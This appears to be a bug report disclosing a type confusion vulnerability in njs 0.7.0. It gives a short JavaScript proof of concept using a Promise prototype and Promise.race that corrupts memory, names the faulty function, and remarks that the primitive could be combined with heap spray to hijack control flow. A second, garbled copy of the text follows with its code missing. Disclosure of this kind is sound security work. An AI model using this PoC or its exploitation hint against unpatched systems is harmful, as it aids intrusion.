Version : 0.7.0
Git Commit : bb796f7b3f3b65a78248f3ba86d0929eb292ca8e
OS : Ubuntu 20.04
Configure : ./Configure --address-sanitizer=YES
Poc
function main() {
function v0(v1,v2) {
return 1
}
var o = [1,2,3,4,5,6]
const v1 = new Promise(v0);
o.__proto__= v1;
const v5 = [o];
const v7 = Promise.race(v5);
console.log(o)
}
main();
Analysis
The output of the above poc is as follows:
Promise [1,2,3,4.000000000000001,5,6]
If I comment out Promise.race(v5):
function main() {
function v0(v1,v2) {
return 1
}
var o = [1,2,3,4,5,6]
const v1 = new Promise(v0);
o.__proto__= v1;
const v5 = [o];
// const v7 = Promise.race(v5);
console.log(o)
}
main();
Then the output will be normal as follows:
Promise [1,2,3,4,5,6]
This is because njs_promise_perform_then has Type Confusion vuln when dealing with promise objects. The code data->is_handled = 1 will write the integer 1 to is_handled field of data that has been confused as njs_promise_data_t, although data may be of other types actually.
We deliberately introduce the non-writable njs_symbol_constructor to prove the validity of the vulnerability. Of course, this primitive can be used to confuse OTHER types of objects, and combined with heap spray technology to achieve control flow hijacking.
Env
Poc
Analysis
The output of the above poc is as follows:
If I comment out Promise.race(v5):
Then the output will be normal as follows:
This is because
njs_promise_perform_then
has Type Confusion vuln when dealing with promise objects. The codedata->is_handled = 1
will write the integer1
tois_handled
field of data that has been confused asnjs_promise_data_t
, although data may be of other types actually.Therefore, when we try to change the data to the
Symbol
type:The following error will be reported as expected:
We deliberately introduce the non-writable
njs_symbol_constructor
to prove the validity of the vulnerability. Of course, this primitive can be used to confuse OTHER types of objects, and combined with heap spray technology to achieve control flow hijacking.Found by
P1umer, Kotori, afang5472 @ IIE NeSE